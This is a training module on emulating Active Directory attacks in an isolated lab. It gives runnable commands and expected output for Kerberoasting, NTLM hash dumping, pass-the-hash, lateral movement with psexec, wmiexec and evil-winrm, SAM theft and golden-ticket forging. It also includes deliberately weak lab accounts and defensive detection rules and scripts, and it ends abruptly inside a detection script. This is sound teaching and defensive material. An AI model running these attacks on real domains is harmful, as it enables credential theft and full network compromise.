MODULE 5: ACTIVE DIRECTORY THREAT EMULATION
Learning Objectives
By completing this module, you will:
- Understand Active Directory architecture and Kerberos authentication
- Deploy a Windows domain environment with Domain Controller and endpoints
- Execute Kerberoasting attacks to extract and crack service account credentials
- Perform Pass-the-Hash and Pass-the-Ticket credential replay attacks
- Conduct lateral movement using PsExec, WMI, and Windows Management protocols
- Enumerate AD environments using BloodHound and PowerView
- Map AD attack techniques to MITRE ATT&CK framework
- Implement detection rules for identity-based attacks
Key Concepts
Active Directory (AD)
Active Directory is Microsoft's centralized identity and access management system, used by over 90% of enterprise networks. AD provides:
- Authentication: Verifies user/computer identities via Kerberos
- Authorization: Controls access to resources (files, printers, applications)
- Directory Services: Centralized database of users, computers, groups, policies
Kerberos Authentication Protocol
```text
User                     Domain Controller (KDC)         File Server
 |                                |                           |
 |---1. AS-REQ------------------->|  (request TGT)            |
 |<--2. AS-REP (TGT)--------------|  (Ticket Granting Ticket) |
 |                                |                           |
 |---3. TGS-REQ (TGT)------------>|  (request Service Ticket) |
 |<--4. TGS-REP (ST)--------------|  (Service Ticket)         |
 |                                |                           |
 |---5. AP-REQ (ST)-------------------------------------------->|
 |<--6. Access granted------------------------------------------|
```
Key Terms:
- TGT (Ticket Granting Ticket): Proves identity to the Domain Controller
- Service Ticket (ST): Grants access to a specific service (file share, SQL server)
- SPN (Service Principal Name): Identifier for a service (e.g., HTTP/web.apophis.local)
- NTLM Hash: Password representation (used for Pass-the-Hash attacks)
Why Active Directory Is a Critical Attack Surface
Enterprise Reality:
- 95% of Fortune 1000 companies use Active Directory
- Single compromised domain admin account = full network compromise
- Identity-based attacks bypass perimeter security (firewalls, VPNs)
- Most data breaches involve credential theft, not software exploits
Common AD Attacks:
- Kerberoasting: Extract encrypted service tickets, crack offline
- Pass-the-Hash: Use stolen NTLM hash without knowing plaintext password
- Golden Ticket: Forge TGTs to impersonate any user
- DCSync: Replicate AD database to steal all password hashes
LAB 5.1: DEPLOY ACTIVE DIRECTORY DOMAIN
Deploy Windows Server 2022 (Domain Controller)
1. CREATE VM IN PROXMOX:
- VM ID: 402
- Name: DC01-Apophis
- OS: Windows Server 2022 ISO
- CPU: 2 cores
- RAM: 4096 MB (4 GB minimum for AD)
- Disk: 60 GB
- Network: vmbr0, VLAN Tag: 400 (VICTIM_NET)
2. INSTALL WINDOWS SERVER:
- Select: Windows Server 2022 Standard (Desktop Experience)
- Custom installation: Select full disk
- Set Administrator password: P@ssw0rd! (for lab only)
3. CONFIGURE STATIC IP:
- Open: Settings > Network & Internet > Ethernet
- IP address: 10.10.4.100
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 127.0.0.1 (will point to itself after AD installation)
4. RENAME COMPUTER:
- Server Manager > Local Server > Computer Name > Change
- New name: DC01
- Restart when prompted
5. INSTALL ACTIVE DIRECTORY DOMAIN SERVICES:
- Server Manager > Manage > Add Roles and Features
- Server Roles: Check "Active Directory Domain Services"
- Click "Add Features" when prompted
- Click "Next" through wizard, then "Install"
- Wait 5-10 minutes for installation
6. PROMOTE TO DOMAIN CONTROLLER:
- Server Manager > Notification flag (yellow triangle)
- Click "Promote this server to a domain controller"
- Select: "Add a new forest"
- Root domain name: apophis.local
- Forest/Domain functional level: Windows Server 2016 (default)
- DSRM password: P@ssw0rd!
- Click "Next" through wizard
- Prerequisites Check: Click "Install"
- Server will automatically restart (takes 5-10 minutes)
7. VERIFY AD INSTALLATION:
- Login as: APOPHIS\Administrator
- Password: P@ssw0rd!
- Open: Active Directory Users and Computers (Start > search "dsa.msc")
- Expand apophis.local > See default OUs (Users, Computers, Domain Controllers)
Deploy Windows 10 (Domain Endpoint)
1. CREATE VM IN PROXMOX:
- VM ID: 403
- Name: CLIENT01-Apophis
- OS: Windows 10 Pro ISO
- CPU: 2 cores
- RAM: 4096 MB
- Disk: 40 GB
- Network: vmbr0, VLAN Tag: 400
2. INSTALL WINDOWS 10:
- Select: Windows 10 Pro
- Create local user: labuser
- Password: Welcome1
3. CONFIGURE NETWORK:
- Settings > Network & Internet > Ethernet > Change adapter options
- Right-click Ethernet > Properties > IPv4
- IP address: 10.10.4.110
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 10.10.4.100 (Domain Controller IP)
- Click OK
4. VERIFY DNS RESOLUTION:
- Open Command Prompt
- Run: nslookup apophis.local
- Should resolve to: 10.10.4.100
- If not, check DC01 DNS service is running
5. JOIN DOMAIN:
- Settings > System > About > Rename this PC (advanced)
- Click "Change"
- Member of: Domain
- Domain: apophis.local
- Click OK
- Credentials: APOPHIS\Administrator / P@ssw0rd!
- Welcome message appears: "Welcome to the apophis.local domain"
- Restart when prompted
6. LOGIN AS DOMAIN USER:
- At login screen: Other user
- Username: Administrator
- Password: P@ssw0rd!
- Domain: APOPHIS (or APOPHIS\Administrator)
- Verify: whoami → apophis\administrator
Create Vulnerable Service Account (Kerberoasting Target)
```powershell
# On Domain Controller (DC01), open PowerShell as Administrator

# CREATE ORGANIZATIONAL UNIT FOR SERVICE ACCOUNTS
New-ADOrganizationalUnit -Name "Service Accounts" -Path "DC=apophis,DC=local"

# CREATE SERVICE ACCOUNT WITH WEAK PASSWORD
New-ADUser -Name "svc_sql" `
    -SamAccountName "svc_sql" `
    -UserPrincipalName "svc_sql@apophis.local" `
    -AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) `
    -Enabled $true `
    -PasswordNeverExpires $true `
    -Path "OU=Service Accounts,DC=apophis,DC=local"

# ASSIGN SERVICE PRINCIPAL NAME (SPN) - THIS MAKES IT KERBEROASTABLE
setspn -A MSSQLSvc/sqlserver.apophis.local:1433 apophis\svc_sql

# VERIFY SPN WAS SET
setspn -L svc_sql
# Expected output:
# Registered ServicePrincipalNames for CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local:
#     MSSQLSvc/sqlserver.apophis.local:1433

# ADD TO DOMAIN ADMINS (simulate high-privilege service account)
Add-ADGroupMember -Identity "Domain Admins" -Members svc_sql

# CREATE ADDITIONAL DOMAIN USERS FOR REALISM
New-ADUser -Name "John Smith" -SamAccountName "jsmith" -AccountPassword (ConvertTo-SecureString "Welcome1" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Jane Doe" -SamAccountName "jdoe" -AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Bob Admin" -SamAccountName "badmin" -AccountPassword (ConvertTo-SecureString "Admin123" -AsPlainText -Force) -Enabled $true

# ADD BOB TO DOMAIN ADMINS
Add-ADGroupMember -Identity "Domain Admins" -Members badmin

# VERIFY USERS CREATED
Get-ADUser -Filter * | Select-Object Name, SamAccountName
```
Why This Configuration is Vulnerable:
- Weak Password: "Password123" is in common wordlists (rockyou.txt)
- SPN Assigned: Any domain user can request service ticket for this account
- Password Never Expires: No rotation policy (common in real enterprises)
- Domain Admin Membership: Cracking this account = full domain compromise
LAB 5.2: KERBEROASTING ATTACK
Understanding Kerberoasting
Attack Flow:
- Attacker compromises low-privilege domain user account
- Queries AD for all accounts with Service Principal Names (SPNs)
- Requests service tickets for those accounts from Domain Controller
- DC responds with tickets encrypted using service account's NTLM hash
- Attacker takes tickets offline and cracks with hashcat/John (no account lockout)
- If password is weak, attacker obtains plaintext credentials
Why It Works:
- Requesting service tickets is normal behavior (not suspicious)
- The ticket is encrypted with a key derived from the service account's password (the NT hash directly for RC4, a PBKDF2-derived key for AES), not with a random key
- Cracking happens offline at millions of guesses per second
- No failed login attempts (no account lockout)
LAB 5.2.1: Kerberoasting with Impacket (from Kali Linux)
Prerequisites:
- Compromised domain credentials (jsmith / Welcome1)
- Network access to Domain Controller (10.10.4.100)
```bash
# FROM KALI LINUX (VLAN 200 - Red Team)

# STEP 1: VERIFY CONNECTIVITY TO DOMAIN CONTROLLER
ping 10.10.4.100
# Expected: Replies from 10.10.4.100

# STEP 2: VERIFY DNS RESOLUTION (query the DC's DNS service directly)
nslookup apophis.local 10.10.4.100
# Expected: Name: apophis.local, Address: 10.10.4.100

# STEP 3: ENUMERATE SPNS WITH GETUSERSPNS.PY (Impacket)
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100
# Expected Output:
# ServicePrincipalName                   Name     MemberOf                              PasswordLastSet
# -------------------------------------  -------  ------------------------------------  -------------------
# MSSQLSvc/sqlserver.apophis.local:1433  svc_sql  CN=Domain Admins,CN=Users,DC=apophis  2024-01-15 10:23:45

# STEP 4: REQUEST SERVICE TICKET AND SAVE TO FILE
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100 -request -outputfile kerberoast_hashes.txt
# Possible error:
# [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
# ^ If you see this, sync time with: sudo ntpdate 10.10.4.100
# Successful output:
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL$MSSQLSvc/sqlserver.apophis.local:1433*$a1b2c3d4...

# STEP 5: VERIFY HASH FILE
cat kerberoast_hashes.txt
# Should contain the Kerberos TGS-REP hash in John/Hashcat format

# STEP 6: CRACK WITH HASHCAT
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# -m 13100 = Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
# --force  = Ignore warnings (for VM environments)
# Expected Output (after 30-60 seconds):
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL...:Password123

# STEP 7: EXTRACT CRACKED PASSWORD
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --show
# Output: ...svc_sql...:Password123

# STEP 8: VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# Expected Output:
# SMB  10.10.4.100  445  DC01  [+] apophis.local\svc_sql:Password123 (Pwn3d!)
# "Pwn3d!" = Account has administrative access to target
```
Alternative: Rubeus (from Windows endpoint)
```powershell
# If you have a foothold on CLIENT01 (Windows 10, domain-joined)
# Download Rubeus from GitHub (https://github.com/GhostPack/Rubeus)
# Transfer to CLIENT01 via SMB/HTTP

# Execute Rubeus
.\Rubeus.exe kerberoast /outfile:tickets.txt
# Expected Output:
# [*] Total kerberoastable users : 1
# [*] SamAccountName         : svc_sql
# [*] DistinguishedName      : CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local
# [*] ServicePrincipalName   : MSSQLSvc/sqlserver.apophis.local:1433
# [*] Hash written to tickets.txt

# Transfer tickets.txt to Kali for cracking
```
Deliverable: Screenshot showing:
- GetUserSPNs.py enumeration output
- Hashcat cracking success with plaintext password revealed
- CrackMapExec verification showing "Pwn3d!"
LAB 5.3: PASS-THE-HASH ATTACK
Understanding Pass-the-Hash
Concept: Windows authentication can use NTLM hashes directly without needing plaintext passwords. If you steal a hash, you can authenticate as that user.
Attack Scenario:
- Attacker compromises workstation with local admin access
- Dumps LSASS memory to extract cached credentials (NTLM hashes)
- Uses hash to authenticate to other systems via SMB/WMI/RDP
- Repeats process to move laterally (spray-and-pray or targeted)
LAB 5.3.1: Dumping NTLM Hashes with Secretsdump
```bash
# FROM KALI LINUX

# STEP 1: DUMP HASHES FROM DOMAIN CONTROLLER (requires admin creds)
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output (NTLM hashes):
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
# svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
# jsmith:1105:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
# Format: username:RID:LM_hash:NTLM_hash:::
# LM hash (aad3b435...) = Empty/disabled (modern Windows)
# NTLM hash = What we need for Pass-the-Hash

# STEP 2: SAVE ADMINISTRATOR NTLM HASH
ADMIN_HASH="58a478135a93ac3bf058a5ea0e8fdb71"
# This is the NT hash of the DOMAIN Administrator account (your lab values will differ)

# STEP 3: PASS-THE-HASH TO CLIENT01 (without knowing the plaintext password)
# The hash came from the domain database, so qualify the user with the domain:
# a bare "Administrator@target" is treated as the target's LOCAL Administrator account.
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:$ADMIN_HASH apophis.local/Administrator@10.10.4.110
# Breakdown:
# -hashes LM:NTLM (LM is always aad3b435b51404eeaad3b435b51404ee for empty)
# apophis.local/Administrator = domain and username
# @10.10.4.110 = target (CLIENT01)
# Expected Output:
# [*] Requesting shares on 10.10.4.110.....
# [*] Found writable share ADMIN$
# [*] Uploading file [random].exe
# [*] Opening SVCManager on 10.10.4.110.....
# [*] Starting service [random] on 10.10.4.110.....
# [!] Press help for extra shell commands
# C:\Windows\system32>

# STEP 4: VERIFY ACCESS (commands below run inside the psexec.py shell on CLIENT01)
whoami
# Output: nt authority\system (SYSTEM = highest privilege)
hostname
# Output: CLIENT01

# STEP 5: DUMP LOCAL SAM DATABASE (for more credentials)
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
# Download files to Kali (or use secretsdump on localhost)
```
Alternative: CrackMapExec for Pass-the-Hash
```bash
# TEST HASH AGAINST MULTIPLE TARGETS (spray technique)
crackmapexec smb 10.10.4.0/24 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 --local-auth
# --local-auth = Use local accounts (not domain); only succeeds where the LOCAL
#                Administrator password matches the hash. For the DOMAIN Administrator
#                hash dumped from DC01, drop --local-auth and add -d apophis.local.
# /24 = Scan entire subnet
# Expected Output:
# SMB  10.10.4.110  445  CLIENT01  [+] CLIENT01\Administrator:58a478... (Pwn3d!)
# SMB  10.10.4.100  445  DC01      [+] APOPHIS\Administrator:58a478... (Pwn3d!)

# EXECUTE COMMANDS REMOTELY WITH PASS-THE-HASH
crackmapexec smb 10.10.4.110 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 -d apophis.local -x "whoami"
# -x = Execute command
# Expected Output: apophis\administrator
```
Deliverable:
- Screenshot showing secretsdump.py output with NTLM hashes
- Screenshot showing successful psexec.py shell with "nt authority\system"
LAB 5.4: LATERAL MOVEMENT TECHNIQUES
LAB 5.4.1: PsExec (Service-Based Execution)
How PsExec Works:
- Connects to target via SMB (port 445)
- Copies executable to ADMIN$ share (C:\Windows)
- Creates and starts Windows service to run executable
- Returns output via named pipes
```bash
# PSEXEC WITH CREDENTIALS
psexec.py apophis.local/svc_sql:Password123@10.10.4.110

# PSEXEC WITH HASH (domain-qualified user; the LM half may be left empty)
psexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 apophis.local/Administrator@10.10.4.110

# PSEXEC TO DOMAIN CONTROLLER
# The password contains "@", which Impacket's user:pass@target parser would split on,
# so omit it on the command line and type P@ssw0rd! at the prompt instead.
psexec.py apophis.local/Administrator@10.10.4.100

# Expected Shell:
# C:\Windows\system32> whoami
# nt authority\system
```
Detection Artifacts:
- Service creation event (Event ID 7045)
- Network connection to ADMIN$/IPC$ shares
- Process with parent: services.exe
LAB 5.4.2: WMIExec (Fileless Execution)
Advantage over PsExec: No file written to disk (fileless), harder to detect
```bash
# WMIEXEC WITH CREDENTIALS
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110

# WMIEXEC WITH HASH
wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 apophis.local/Administrator@10.10.4.110

# Expected Shell:
# C:\> whoami
# apophis\administrator

# EXECUTE SINGLE COMMAND (no interactive shell)
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110 "ipconfig"
```
Detection Artifacts:
- WMI process creation (Event ID 4688 with parent: WmiPrvSE.exe)
- Network: DCOM/WMI traffic (port 135 + ephemeral)
LAB 5.4.3: SMBExec (Batch File Execution)
```bash
# SMBEXEC WITH CREDENTIALS
smbexec.py apophis.local/svc_sql:Password123@10.10.4.110
# Creates a batch file in the ADMIN$ share and executes it via a service
# More stealthy than PsExec (no executable dropped)
```
LAB 5.4.4: Evil-WinRM (PowerShell Remoting)
Prerequisite: Target must have WinRM enabled (default on Servers, not Workstations)
```bash
# INSTALL EVIL-WINRM
sudo gem install evil-winrm

# CONNECT WITH CREDENTIALS
evil-winrm -i 10.10.4.100 -u Administrator -p 'P@ssw0rd!'

# CONNECT WITH HASH
evil-winrm -i 10.10.4.100 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71

# Expected Shell:
# *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
# apophis\administrator

# UPLOAD FILES (inside the Evil-WinRM shell)
upload /root/tools/mimikatz.exe C:\Windows\Temp\mimikatz.exe

# DOWNLOAD FILES
download C:\Windows\System32\config\SAM /root/loot/sam
```
LAB 5.5: ACTIVE DIRECTORY ENUMERATION WITH BLOODHOUND
Understanding BloodHound
BloodHound visualizes Active Directory relationships to identify attack paths:
- Who has admin rights on which computers?
- Shortest path from user X to Domain Admin?
- Which accounts have SPN (Kerberoastable)?
- Trust relationships between domains?
Attack Workflow:
- Run SharpHound collector (PowerShell/C#) on domain-joined machine
- Generates JSON files with AD relationships
- Import into BloodHound GUI to visualize
- Query for attack paths (e.g., "Shortest Path to Domain Admins")
LAB 5.5.1: Install BloodHound on Kali
```bash
# STEP 1: INSTALL NEO4J (graph database) AND BLOODHOUND
sudo apt update
sudo apt install neo4j bloodhound -y

# STEP 2: START NEO4J DATABASE
sudo neo4j console
# Wait for "Started" message
# Access web UI: http://localhost:7474
# Default creds: neo4j / neo4j
# Change password when prompted: bloodhound123

# STEP 3: START BLOODHOUND GUI (new terminal)
bloodhound
# Login:
# Database URL: bolt://localhost:7687
# Username: neo4j
# Password: bloodhound123
```
LAB 5.5.2: Collect AD Data with BloodHound Python Ingestor
```bash
# FROM KALI LINUX (no need to touch Windows machines)

# INSTALL BLOODHOUND-PYTHON
pip3 install bloodhound

# RUN COLLECTOR
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All
# Parameters:
# -u     = username
# -p     = password
# -d     = domain
# -ns    = nameserver (DC IP)
# -c All = collect everything (users, groups, computers, sessions, trusts)
# Expected Output:
# INFO: Found AD domain: apophis.local
# INFO: Connecting to LDAP server: dc01.apophis.local
# INFO: Found 1 domains
# INFO: Found 1 domains in the forest
# INFO: Found 2 computers
# INFO: Found 5 users
# INFO: Found 0 trusts
# INFO: Starting computer enumeration...
# INFO: Done in 00M 12S

# OUTPUT FILES:
ls -lh *.json
# 20240115_computers.json
# 20240115_users.json
# 20240115_groups.json
# 20240115_domains.json
```
LAB 5.5.3: Analyze Attack Paths in BloodHound
1. IMPORT DATA INTO BLOODHOUND:
- BloodHound GUI > Upload Data (right panel)
- Select all JSON files from previous step
- Wait for import to complete (shows # of nodes processed)
2. SEARCH FOR DOMAIN ADMINS:
- Search bar > Type "Domain Admins" > Select group
- Right-click node > "Mark Group as High Value"
- Graph shows all members (Administrator, svc_sql, badmin)
3. FIND KERBEROASTABLE ACCOUNTS:
- Analysis tab > "List all Kerberoastable Accounts"
- Should show: svc_sql with SPN MSSQLSvc/sqlserver.apophis.local:1433
4. FIND SHORTEST PATH TO DOMAIN ADMINS:
- Analysis tab > "Shortest Paths to Domain Admins"
- Shows graph of attack paths from low-privilege users
- Example: jsmith → CLIENT01 (LocalAdmin) → badmin (Session) → Domain Admins
5. FIND COMPUTERS WHERE DOMAIN ADMINS ARE LOGGED IN:
- Search for specific user (e.g., "Administrator")
- Click node > "Sessions" tab
- Shows CLIENT01, DC01 (indicates where admin is logged in = PtH target)
6. CUSTOM CYPHER QUERY (advanced):
- Raw Query box (bottom):
MATCH (u:User {hasspn: true}) RETURN u
- Returns all users with SPN (Kerberoastable targets)
Key Queries to Practice:
```cypher
// Find all Domain Admins
MATCH (n:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}) RETURN n

// Find computers with unconstrained delegation (privilege escalation vector)
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

// Find users with "Password Never Expires"
MATCH (u:User {pwdneverexpires:true}) RETURN u

// Shortest path from a specific user to Domain Admins
MATCH (u:User {name:"JSMITH@APOPHIS.LOCAL"}), (g:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}),
      p=shortestPath((u)-[*1..]->(g))
RETURN p
```
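The `hasspn: true` query above is the Cypher view of the weaknesses listed under "Why This Configuration is Vulnerable". As an added defensive example (not part of this module or of BloodHound), the script below reads a users.json in the shape bloodhound-python writes and ranks Kerberoastable accounts by those weaknesses; the JSON schema is assumed, and every account except svc_sql and jsmith is constructed.

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed users.json in the shape bloodhound-python writes. Assumed schema:
# a "data" list whose entries carry a "Properties" dict; only the properties this
# audit uses are included. svc_sql and jsmith come from LAB 5.1; the rest are made up.
USERS_JSON = """
{
  "data": [
    {"Properties": {"name": "SVC_SQL@APOPHIS.LOCAL", "enabled": true, "hasspn": true,
      "serviceprincipalnames": ["MSSQLSvc/sqlserver.apophis.local:1433"],
      "pwdneverexpires": true, "admincount": true, "pwdlastset": 1705314225}},
    {"Properties": {"name": "JSMITH@APOPHIS.LOCAL", "enabled": true, "hasspn": false,
      "serviceprincipalnames": [], "pwdneverexpires": false, "admincount": false,
      "pwdlastset": 1705314300}},
    {"Properties": {"name": "SVC_WEB@APOPHIS.LOCAL", "enabled": true, "hasspn": true,
      "serviceprincipalnames": ["HTTP/web.apophis.local"],
      "pwdneverexpires": false, "admincount": false, "pwdlastset": 1640995200}},
    {"Properties": {"name": "SVC_OLD@APOPHIS.LOCAL", "enabled": false, "hasspn": true,
      "serviceprincipalnames": ["HOST/old.apophis.local"],
      "pwdneverexpires": true, "admincount": false, "pwdlastset": 1609459200}},
    {"Properties": {"name": "KRBTGT@APOPHIS.LOCAL", "enabled": false, "hasspn": true,
      "serviceprincipalnames": ["kadmin/changepw"],
      "pwdneverexpires": false, "admincount": true, "pwdlastset": 1700000000}}
  ],
  "meta": {"type": "users", "count": 5, "version": 4}
}
"""

MAX_PASSWORD_AGE = timedelta(days=365)   # service account passwords should rotate at least yearly


def kerberoast_risk(users, now):
    """Rank enabled SPN-bearing accounts by the weaknesses LAB 5.1 builds into svc_sql.

    Score: +3 admincount (member of Domain Admins or another AdminSDHolder-protected group),
           +2 password never expires, +1 password older than MAX_PASSWORD_AGE.
    Disabled accounts and krbtgt are dropped although hasspn is true for them, which is
    why the raw `hasspn: true` Cypher query over-reports.
    """
    findings = []
    for entry in users["data"]:
        props = entry["Properties"]
        sam = props["name"].split("@", 1)[0].lower()
        if not props.get("hasspn") or not props.get("enabled") or sam == "krbtgt":
            continue
        pwd_set = datetime.fromtimestamp(props["pwdlastset"], tz=timezone.utc)
        score, reasons = 0, []
        if props.get("admincount"):
            score += 3
            reasons.append("privileged (admincount)")
        if props.get("pwdneverexpires"):
            score += 2
            reasons.append("password never expires")
        if now - pwd_set > MAX_PASSWORD_AGE:
            score += 1
            reasons.append(f"password age {(now - pwd_set).days}d")
        findings.append({"account": sam, "spns": props["serviceprincipalnames"],
                         "score": score, "reasons": reasons})
    # Highest score first: the order in which to rotate to long random passwords
    # or move the service to a group Managed Service Account.
    return sorted(findings, key=lambda f: (-f["score"], f["account"]))


def run_sample_audit():
    """Run the audit over the constructed export with a fixed clock (2024-01-16 UTC)."""
    users = json.loads(USERS_JSON)
    now = datetime(2024, 1, 16, tzinfo=timezone.utc)
    return kerberoast_risk(users, now)


if __name__ == "__main__":
    for finding in run_sample_audit():
        print(f"{finding['score']}  {finding['account']:<10} {', '.join(finding['reasons'])}")
```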
Deliverable:
- Screenshot showing BloodHound graph with "Shortest Path to Domain Admins"
- Screenshot showing Kerberoastable accounts query result
LAB 5.6: GOLDEN TICKET ATTACK (ADVANCED)
Understanding Golden Tickets
Golden Ticket = Forged Kerberos TGT (Ticket Granting Ticket) that grants:
- Impersonation of ANY user (including non-existent accounts)
- Access to ANY resource in the domain
- Validity for 10 years (the forging tool's default, far beyond the normal 10-hour ticket lifetime)
Requirements:
- KRBTGT account NTLM hash (extract from Domain Controller)
- Domain SID (Security Identifier)
Why It's Devastating:
- Bypasses password changes (uses KRBTGT hash, not user password)
- Hard to detect with routine monitoring (it is a validly signed Kerberos ticket)
- Persists until KRBTGT password rotated (twice for full removal)
LAB 5.6.1: Extract KRBTGT Hash
```bash
# FROM KALI LINUX (requires Domain Admin access)

# STEP 1: EXTRACT THE KRBTGT HASH WITH SECRETSDUMP (replication against the DC)
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100 -just-dc-user krbtgt
# Expected Output:
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3:::

# SAVE KRBTGT HASH
KRBTGT_HASH="d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3"

# STEP 2: GET DOMAIN SID
lookupsid.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output:
# [*] Domain SID is: S-1-5-21-1234567890-1234567890-1234567890

# SAVE DOMAIN SID: use the "Domain SID is:" value as printed. If you copy it from a
# user's SID instead, drop the trailing RID (the part after the last hyphen).
DOMAIN_SID="S-1-5-21-1234567890-1234567890-1234567890"
```
LAB 5.6.2: Forge Golden Ticket
```bash
# CREATE GOLDEN TICKET WITH TICKETER.PY (Impacket)
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain apophis.local fakeadmin
# Parameters:
# -nthash     = KRBTGT NTLM hash
# -domain-sid = Domain SID
# -domain     = Domain name
# fakeadmin   = Username to impersonate (can be anything, even non-existent)
# Expected Output:
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for apophis.local/fakeadmin
# [*] Signing/Encrypting final ticket
# [*] Saving ticket in fakeadmin.ccache

# EXPORT TICKET TO ENVIRONMENT VARIABLE (ticketer.py writes the ccache to the current directory)
export KRB5CCNAME=$PWD/fakeadmin.ccache

# VERIFY TICKET
klist
# Expected (when run from /root):
# Ticket cache: FILE:/root/fakeadmin.ccache
# Default principal: fakeadmin@APOPHIS.LOCAL
# Valid starting       Expires              Service principal
# 01/15/24 10:00:00    01/25/34 10:00:00    krbtgt/APOPHIS.LOCAL@APOPHIS.LOCAL
```
LAB 5.6.3: Use Golden Ticket for Access
```bash
# ACCESS DOMAIN CONTROLLER WITH GOLDEN TICKET
psexec.py apophis.local/fakeadmin@DC01.apophis.local -k -no-pass
# Parameters:
# -k       = Use Kerberos authentication (golden ticket from KRB5CCNAME)
# -no-pass = Don't prompt for password
# Expected Output:
# [*] Requesting shares on DC01.apophis.local.....
# [*] Found writable share ADMIN$
# C:\Windows\system32> whoami
# apophis\fakeadmin

# LIST DOMAIN CONTROLLER C:\ DRIVE
smbclient.py -k -no-pass apophis.local/fakeadmin@DC01.apophis.local
# Expected: Access to C$ share with full admin rights
```
Defensive Countermeasure:
```powershell
# ON DOMAIN CONTROLLER (as recovery action)

# RESET KRBTGT PASSWORD (do this TWICE, 24 hours apart)
# First reset invalidates current golden tickets
# Second reset (after replication) fully removes old hash
# Use Microsoft script: https://github.com/microsoft/New-KrbtgtKeys.ps1
.\New-KrbtgtKeys.ps1 -WhatIf
# Review changes, then run without -WhatIf

# MONITOR FOR GOLDEN TICKET USAGE
# Event ID 4769 (Kerberos TGS request) with:
# - Ticket encryption type: 0x17 (RC4)
# - Account name: Non-existent user
# - Ticket lifetime: Unusual (>10 hours)
```
DEFENSIVE DETECTION & BLUE TEAM RESPONSE
Detection Rules for Kerberoasting
Event ID 4769 (Kerberos Service Ticket Request):
ANOMALOUS INDICATORS:
- Ticket encryption type: 0x17 (RC4-HMAC) instead of 0x12 (AES256)
- Ticket options: 0x40810000 (forwardable, renewable, canonicalize)
- Service name: NOT krbtgt/* (indicates service ticket, not TGT)
- Frequency: Multiple SPN requests from a single source in a short time
SURICATA RULE:
```text
# |a0 03 02 01 05| is the DER-encoded AP-REQ pvno ([0] INTEGER 5) that a TGS-REQ carries
# in its PA-TGS-REQ pre-authentication data; an AS-REQ contains no AP-REQ, so the match
# selects service-ticket requests. Tune "count": an interactive logon also requests
# several service tickets within seconds.
alert tcp any any -> any 88 (msg:"Possible Kerberoasting - Multiple TGS-REQ"; \
    flow:established,to_server; content:"|a0 03 02 01 05|"; \
    threshold:type threshold, track by_src, count 5, seconds 60; \
    sid:5000001; rev:1;)
```
SECURITY ONION (KIBANA KQL) FILTER:
```text
event.code: 4769 AND winlog.event_data.TicketEncryptionType: "0x17" AND NOT winlog.event_data.ServiceName: krbtgt*
```
KQL has no pipe operator, so apply the threshold as a terms aggregation (by winlog.event_data.TargetUserName and source.ip) in a visualization or alert rule; the same logic written as Splunk SPL is:
```text
| stats count by winlog.event_data.TargetUserName, source.ip
| where count > 5
```
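The four 4769 indicators above (RC4 ticket, non-krbtgt service, burst from one source) and the Golden Ticket indicator from LAB 5.6 (a ticket for a non-existent account such as fakeadmin) implemented as detection logic over sample events. This is an added example, not part of the module's lab files; the event records, the user list and the red-team source address 10.10.2.50 are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed directory snapshot; in production this comes from an AD export
# (Get-ADUser -Filter * | Select-Object SamAccountName) refreshed regularly.
KNOWN_USERS = {"administrator", "svc_sql", "jsmith", "jdoe", "badmin", "krbtgt"}

BURST_COUNT = 5                       # same threshold as the Suricata rule above
BURST_WINDOW = timedelta(seconds=60)
RC4_HMAC = "0x17"                     # TicketEncryptionType for RC4-HMAC; AES256 is 0x12


def _principal(target_user_name):
    """'jsmith@APOPHIS.LOCAL' -> 'jsmith' (case-folded sAMAccountName)."""
    return target_user_name.split("@", 1)[0].lower()


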